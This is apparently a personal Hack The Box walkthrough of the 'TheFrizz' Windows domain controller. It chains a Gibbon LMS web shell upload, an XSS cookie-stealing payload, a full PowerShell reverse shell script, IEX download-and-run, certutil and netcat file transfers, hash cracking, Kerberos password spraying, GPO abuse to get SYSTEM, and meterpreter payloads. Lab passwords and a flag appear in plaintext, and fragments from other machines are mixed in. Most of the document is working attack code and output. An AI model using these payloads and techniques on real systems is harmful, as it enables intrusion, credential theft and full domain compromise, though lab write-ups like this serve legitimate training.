htb-thefrizz
Reconnaissance and Enumeration
Port Scanning
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ nmap -sC -sV 10000 10.10.11.60 -oN thefrizz.nmap Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-19 09:53 CET Nmap scan report for 10.10.11.60 Host is up (0.0089s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0) 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12) |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 |_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-19 15:54:08Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-03-19T15:54:09 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled and required |_clock-skew: 6h59m59s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (1 host up) scanned in 52.93 seconds
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql
CVE-2024-24725 – https://www.exploit-db.com/exploits/51903.
Should find credentials for Gibbon LMS.
curl -X POST “http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php” \
-F “id=body” \
-F “bodyfile1=@l.jpg;filename=<img src=x onerror=new Image().src='<redacted>?cookie=’+document.cookie>.jpg” \
-F “imagesAsLinks=Y”
File upload
https://herolab.usd.de/security-advisories/usd-2023-0025/
C:\xampp\htdocs\gibbon-lms> type config.php
$databaseServer = ‘localhost’;
$databaseUsername = ‘MrGibbonsDB’;
$databasePassword = ‘MisterGibbs!Parrot!?1’;
$databaseName = ‘gibbon’;
PS C:\xampp\htdocs\gibbon-lms> netstat -an | FINDSTR 3306 netstat -an | FINDSTR 3306 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP [::]:3306 [::]:0 LISTENING UDP [::]:63306 *:*
Upload a web shell
curl -X POST “http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php” \
-H “Host: frizzdc.frizz.htb” \
–data-urlencode “img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K” \
–data-urlencode “path=shell.php” \
–data-urlencode “gibbonPersonID=0000000001”
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen to the port you declared on revshells.com.
nc -lvnp XXX
1st
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \ -H "Host: frizzdc.frizz.htb" \ --data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \ --data-urlencode "path=shell.php" \ --data-urlencode "gibbonPersonID=0000000001" shell.php ┌──(puck㉿kali)-[~/htb/thefrizz]
then
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=whoami
frizz\w.webservice frizz\w.webservice
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=net user
User accounts for \\FRIZZDC ——————————————————————————- a.perlstein Administrator c.ramon c.sandiego d.hudson f.frizzle g.frizzle Guest h.arm J.perlstein k.franklin krbtgt l.awesome m.ramon M.SchoolBus p.terese r.tennelli t.wright v.frizzle w.li w.Webservice The command completed successfully.
next
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.10.14.3'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
┌──(puck㉿kali)-[~/htb/thefrizz]
cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.3:8000/puckshell.txt’);
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/puckshell.txt');
.
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.60 - - [19/Mar/2025 11:38:32] "GET /puckshell.txt HTTP/1.1" 200 - 10.10.11.60 - - [19/Mar/2025 11:39:29] "GET /puckshell.txt HTTP/1.1" 200 -
and a shell
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.11.60] 51111 Microsoft Windows [Version 10.0.20348.3207] (c) Microsoft Corporation. All rights reserved. C:\xampp\htdocs\Gibbon-LMS>whoami frizz\w.webservice C:\xampp\htdocs\Gibbon-LMS>
.
User:
Now, we can collect AD information as w.webservice , which is a domain user.
Upload SharpBound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.3:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back
nc64.exe 10.10.14.3 5555 < 20241218170837_BloodHound.zip
> nc -nlvp 5555 > output.zip
or we use
serving smb
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
on client
c:\temp>net use \\10.10.14.3\share /u:puck puckpuck
net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
User.
1st we need t find f.frizzle’s hash
c:\xampp\mysql\bin>whoami frizz\w.webservice c:\xampp\mysql\bin>mysql.exe -h localhost -u MrGibbonsDB "-pMisterGibbs!Parrot!?1" -Bse "show databases;" gibbon information_schema test c:\xampp\mysql\bin>mysql.exe -h localhost -u MrGibbonsDB "-pMisterGibbs!Parrot!?1" -Bse "use gibbon;select * from gibbonperson;", 0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 NULL NULL 0 NULL NULL NULL NULL Y YN NULL NULL NULL NULL NULL NULL NULL YNULL NULL NULL c:\xampp\mysql\bin>
and then crack it with:
hashcat -m 1420 ffrizzlehash.txt /usr/share/wordlists/rockyou.txt
.
──(puck㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:Jenni_Luvs_Magic23
[*] Saving ticket in f.frizzle.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ export KRB5CCNAME=f.frizzle.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ klist
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/19/2025 23:11:22 03/20/2025 09:11:22 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 23:11:22
┌──(puck㉿kali)-[~/htb/thefrizz]
then ssh f.frizzle@10.10.11.60
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh f.frizzle@10.10.11.60
The authenticity of host '10.10.11.60 (10.10.11.60)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:46: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.60' (ED25519) to the list of known hosts.
f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(puck㉿kali)-[~/htb/thefrizz]
tried with
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/m.schoolbus
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: !suBcig@MehTed!R
[*] Saving ticket in m.schoolbus.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ export KRB5CCNAME=m.schoolbus.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ klist
Ticket cache: FILE:m.schoolbus.ccache
Default principal: m.schoolbus@FRIZZ.HTB
Valid starting Expires Service principal
03/19/2025 23:20:07 03/20/2025 09:20:07 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 23:20:07
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh m.schoolbus@10.10.11.60
m.schoolbus@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(puck㉿kali)-[~/htb/thefrizz]
.
f.frizzle:Jenni_Luvs_Magic23
m.schoolbus:!suBcig@MehTed!R
after having ccache from m.schoolbus, connect via SSH and abuse GPO with:
#add new GPO
New-GPO -Name “doesnotmatter”
#add newlink to domain controllers
New-GPLink -Name “doesnotmatter” -Target “OU=Domain Controllers,DC=frizz,DC=htb”
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe –AddLocalAdmin –UserAccount M.SchoolBus –GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe “M.SchoolBus” ‘!suBcig@MehTed!R’ powershell.exe -r 10.10.14.7:9001
the transfer of runasc and sharpgpoabuse is up to you
krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
proxiable = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
sudo ntpdate 10.10.11.60
getTGT.py frizz.htb/f.frizzle
export KRB5CCNAME=f.frizzle.ccache
ssh f.frizzle@10.10.11.60
This work for me
i did everything right. still this error . hate this machine ..
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
It should work, when you ssh, try to use: ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
It may also help to have /etc/hosts like this:
10.10.11.60 frizzdc.frizz.htb frizz.htb
So having the DC name as first entry.
This resolved some rDNS issues for me.
For me worked
Before logging in set config ssh first to allow kerberos authentication to succeed by modifying the file /etc/ssh/ssh_config and allow some options
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPIKeyExchange yes
GSSAPITrustDNS yes
and for SSH login we need to export the kerberos file ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh -K f.frizzle@10.10.11.60
PowerShell 7.4.5
PS C:\Users\f.frizzle>
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> cd desktop
PS C:\Users\f.frizzle\Desktop> dir
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 4/9/2025 7:38 AM 34 user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
a7a925069533cab461043a66ff7ff57c
PS C:\Users\f.frizzle\Desktop>
.
privesc from f,frizz to higher
PS C:\ProgramData> whoami frizz\f.frizzle PS C:\ProgramData> (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items() Application : System.__ComObject Parent : System.__ComObject Name : wapt-backup-sunday.7z Path : C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z GetLink : GetFolder : IsLink : False IsFolder : False IsFileSystem : True IsBrowsable : False ModifyDate : 10/24/2024 9:16:29 PM Size : 30416987 Type : 7Z File PS C:\ProgramData>
The above powershell command is to view files after they have been deleted from the recycle bin and there is a file named wapt-backup-sunday.7z, just do a restore
//ambil path
$pathFile = (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items() | Select -ExpandProperty Path
//copy
Copy-Item $pathFile ./
PS C:\ProgramData> whoami
frizz\f.frizzle
PS C:\ProgramData> (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items()
Application : System.__ComObject
Parent : System.__ComObject
Name : wapt-backup-sunday.7z
Path : C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
GetLink :
GetFolder :
IsLink : False
IsFolder : False
IsFileSystem : True
IsBrowsable : False
ModifyDate : 10/24/2024 9:16:29 PM
Size : 30416987
Type : 7Z File
PS C:\ProgramData> $pathFile = (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items() | Select -ExpandProperty Path
PS C:\ProgramData> Copy-Item $pathFile ./
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 5/8/2021 1:27 AM Microsoft
d----- 2/20/2025 2:50 PM Package Cache
d----- 2/26/2025 8:05 AM regid.1991-06.com.microsoft
d----- 5/8/2021 1:15 AM SoftwareDistribution
d----- 3/17/2025 4:12 PM ssh
d----- 10/29/2024 7:15 AM USOPrivate
d----- 5/8/2021 1:15 AM USOShared
d----- 2/20/2025 2:50 PM VMware
-a---- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-a---- 4/10/2025 9:23 AM 6 1.txt
-a---- 4/10/2025 6:54 AM 12447 20250410065420_BloodHound.zip
-a---- 4/10/2025 7:50 AM 12644 20250410075037_output.zip
-a---- 4/10/2025 6:54 AM 10410 MzY2OGI0YzgtYjEwMy00ZDZmLThhNzAtNmI4ZDI0NjQ1YmNj.bin
-a---- 4/10/2025 6:53 AM 1046528 SharpHound.exe
PS C:\ProgramData>
Just go back to using SCP to download from the target server to local.
scp f.frizzle@frizz.htb:'./$RE2XMEG.7z' ./
//lalu extract
7za x -y '$RE2XMEG.7z' -o/home/kali/ctf/htb/frizz/unarchive
--
i used python3 -m uploadserver ( and then netcat to transfer the file to my kali box )
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ python3 -m uploadserver File upload available at /upload Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.60 - - [10/Apr/2025 19:43:05] "GET /nc64.exe HTTP/1.1" 200 -
then
PS C:\ProgramData> curl http://10.10.14.13:8000/nc64.exe -outfile nc64.exe
then
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ nc -nlvp 9001 > RE2XMEG.7z
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.60] 55918
PS C:\ProgramData> cmd
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
frizz\f.frizzle@FRIZZDC C:\ProgramData>nc64.exe 10.10.14.13 9001 < $RE2XMEG.7z
.
then extract
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ 7za x -y 'RE2XMEG.7z' -o/home/puck/htb/thefrizz/unarchive
7-Zip (a) 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: RE2XMEG.7z
--
Path = RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
┌──(puck㉿kali)-[~/htb/thefrizz]
.
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ ls
ca-192.168.120.158.crt forward_ssl_auth.conf uwsgi_params waptserver.ini.template
ca-192.168.120.158.pem require_ssl_auth.conf waptserver.ini
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ grep -rl "password" ./
./waptserver.ini
./waptserver.ini.template
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ cat waptserver.ini | grep password
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$
And you can see that the extract or decompression results are numerous, and after filtering using grep and a little analysis, a password was found encoded in base64 in the file ./conf/waptserver.ini
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf] └─$ echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d !suBcig@MehTed!R
.
Next passwordpray this pasword to the userlist
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ./kerbrute_linux_amd64 passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/10/25 - Ronnie Flathers @ropnop
2025/04/10 21:06:35 > Using KDC(s):
2025/04/10 21:06:35 > 10.10.11.60:88
2025/04/10 21:06:35 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@MehTed!R
2025/04/10 21:06:35 > Done! Tested 20 logins (1 successes) in 0.112 seconds
It finds that pasword beongs to : M.SchoolBus@frizz.htb:!suBcig@MehTed!R
.
.
.
GPO privesc
BloodHound shows:
PS C:\ProgramData> New-GPO -Name "pGPO"
New-GPO -Name "pGPO"
DisplayName : pGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : d3835771-8a10-49c8-bd80-99e1f6d437d5
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 4/9/2025 8:50:34 AM
ModificationTime : 4/9/2025 8:50:34 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
PS C:\ProgramData> New-GPLink -Name "pGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
New-GPLink -Name "pGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : d3835771-8a10-49c8-bd80-99e1f6d437d5
DisplayName : pGPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
PS C:\ProgramData> Get-GPO -All
Get-GPO -All
DisplayName : Default Domain Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:25:44 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 2, SysVol Version: 2
WmiFilter :
DisplayName : Default Domain Controllers Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:19:24 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 1, SysVol Version: 1
WmiFilter :
DisplayName : pGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : d3835771-8a10-49c8-bd80-99e1f6d437d5
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 4/9/2025 8:50:34 AM
ModificationTime : 4/9/2025 8:50:34 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
PS C:\ProgramData> .\gpo.exe --AddComputerTask --TaskName "privesc" --Author administrator --Command "cmd.exe" --Arguments "/c C:\programdata\rcat_10.10.14.13_9001.exe" --GPOName "pGPO" --Force
.\gpo.exe --AddComputerTask --TaskName "privesc" --Author administrator --Command "cmd.exe" --Arguments "/c C:\programdata\rcat_10.10.14.13_9001.exe" --GPOName "pGPO" --Force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "pGPO" is: {D3835771-8A10-49C8-BD80-99E1F6D437D5}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{D3835771-8A10-49C8-BD80-99E1F6D437D5}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\ProgramData> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\ProgramData>
.
Giving a shell
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.11.60] 57317 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32> hostname hostname frizzdc PS C:\Windows\system32>
.
.
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=1337 -f exe > shell2.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 200774 bytes Final size of exe file: 207360 bytes
.
┌──(puck㉿kali)-[~/htb/thefrizz] └─$ msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.10.14.3; set LPORT 1337; run" [*] Using configured payload generic/shell_reverse_tcp payload => windows/meterpreter/reverse_tcp LHOST => 10.10.14.3 LPORT => 1337 [*] Started reverse TCP handler on 10.10.14.3:1337 [*] Sending stage (175686 bytes) to 10.10.11.60 [*] Meterpreter session 1 opened (10.10.14.3:1337 -> 10.10.11.60:60582) at 2025-03-20 17:57:20 +0100 meterpreter > getuid Server username: frizz\w.Webservice meterpreter >
.
*Evil-WinRM* PS C:\programdata> $SecPassword = ConvertTo-SecureString 'Jenni_Luvs_Magic23!' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> $Cred = New-Object System.Management.Automation.PSCredential('frizzle.htb\f.frizzle', $SecPassword) ┌──(puck㉿kali)-[~/htb/thefrizz] └─$ cat getshell.ps1 $username = 'FRIZZ\f.frizzle' $password = 'Jenni_Luvs_Magic23!' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword New-PSSession -Credential $credential | Enter-PSSession ┌──(puck㉿kali)-[~/htb/thefrizz] .
PS C:\programdata> .\RunasCs.exe puck 'Start123!' -l 8 "rcat_10.10.14.3_443.exe" .\RunasCs.exe puck 'Start123!' -l 8 "rcat_10.10.14.3_443.exe" [*] Warning: User profile directory for user puck does not exists. Use --force-profile if you want to force the creation. [*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '8'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type. [*] Warning: The logon for user 'puck' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
┌──(puck㉿kali)-[~/htb/absolute] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.11.181] 64601 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami absolute\puck
.
nog proberen
RunasCs
The RunasCs project aims to create a binary like runas.exe but without limitations:
- Allows explicit credentials
- Works both if spawned from interactive process and from service process
- Manage properly DACL for Window Stations and Desktop for the creation of the new process
- Uses more reliable create process functions like
CreateProcessAsUser()andCreateProcessWithTokenW()if the calling process holds the required privileges (automatic detection)- Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
- Allows to bypass UAC when an administrator password is known (flag –bypass-uac)
- Allows redirecting stdin, stdout and stderr to a remote host
- It’s Open Source 🙂
It’s from one of the authors of the Potato exploits, and a really nice tool to have.
I’ll download the latest release, host it with a Python web server, and upload it to Flight:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/RunasCs.exe -outfile r.exe
Now I’ll invoke a cmd.exe as C.Bun using -r to redirect STDIN/STDOUT to my host:
C:\ProgramData>r.exe m.schoolbus !suBcig@MehTed!R -r 10.10.14.3:443 cmd
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5ea78$\Default
[+] Async process 'cmd' with pid 4508 created and left in background.
C:\ProgramData>
With nc listening on my box, there’s a connection:
┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50043
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\Windows\system32>
I can now get user.txt:
Beyond root : Cleanup script
PS C:\users\Administrator\Desktop> type cleanup.ps1
type cleanup.ps1
get-gpo -all|where {$_.Owner -ne "frizz\Domain Admins"}|%{write-host "removing gpo $($_.displayname)";$_|remove-gpo}
$names=@(
'i18n',
'installer',
'lib',
'modules',
'resources',
'src',
'themes',
'uploads',
'vendor',
'.htaccess',
'CHANGEDB.php',
'CHANGELOG.txt',
'composer.json',
'composer.lock',
'config.php',
'error.php',
'export.php',
'favicon.ico',
'fullscreen.php',
'functions.php',
'gibbon.php',
'gibbon.sql',
'gibbon_demo.sql',
'index.php',
'indexExport.php',
'indexFindRedirect.php',
'index_fastFinder_ajax.php',
'index_notification_ajax.php',
'index_notification_ajax_alarm.php',
'index_notification_ajax_alarmConfirmProcess.php',
'index_notification_ajax_alarmProcess.php',
'index_notification_ajax_alarm_tickUpdate.php',
'index_parentPhotoDeleteProcess.php',
'index_parentPhotoUploadProcess.php',
'index_tt_ajax.php',
'keepAlive.php',
'LICENSE',
'login.php',
'logout.php',
'notifications.php',
'notificationsActionProcess.php',
'notificationsDeleteAllProcess.php',
'notificationsDeleteProcess.php',
'passwordReset.php',
'passwordResetProcess.php',
'preferences.php',
'preferencesPasswordProcess.php',
'preferencesProcess.php',
'privacyPolicy.php',
'publicRegistration.php',
'publicRegistrationCheck.php',
'publicRegistrationProcess.php',
'README.md',
'report.php',
'robots.txt',
'roleSwitcherProcess.php',
'update.php',
'version.php',
'yearSwitcherProcess.php'
)
get-item c:\frizz-builder|remove-item -recurse -force
gci c:\xampp\htdocs\gibbon-LMS\|%{if($names -notcontains $_.name){write-host "removing $($_.name)";$_|remove-item -recurse}}
$date = get-date -f "yyyy-MM-dd"
start-process -FilePath 'c:\xampp\mysql\bin\mysql.exe' -ArgumentList ("-uMrGibbonsDB -pMisterGibbs!Parrot!?1 -e `"update gibbon.gibbonMessenger SET messageWall_date1='$date';`"")
$names=@(
'Gibbon-LMS',
'home'
)
gci c:\xampp\htdocs\|%{if($names -notcontains $_.name){write-host "removing $($_.name)";$_|remove-item -recurse}}
get-adcomputer -filter * | where {$_.name -ne "frizzdc"}|remove-adcomputer -confirm:$false
PS C:\users\Administrator\Desktop>
…